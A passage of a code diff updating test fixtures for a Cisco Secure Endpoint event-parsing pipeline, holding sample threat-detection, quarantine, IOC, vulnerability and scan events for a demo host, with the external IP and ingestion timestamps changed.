Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index 18a94df069c..38cf5f7a80e 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -24,7 +24,7 @@ "128aa78059540cf0cdae2a3cea30cd80e00f2046" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -38,8 +38,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322410226Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", + "ingested": "2021-12-09T13:35:29.222399500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -61,7 +61,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -94,7 +94,7 @@ "Demo_AMP_Threat_Quarantined" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -104,8 +104,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322416058Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222408700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -122,7 +122,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -176,7 +176,7 @@ "cf162622e29bca072d01b274fbbc3ceaacdd13c7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -193,8 +193,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322418540Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222414700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -216,7 +216,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -261,7 +261,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -271,8 +271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322420859Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat 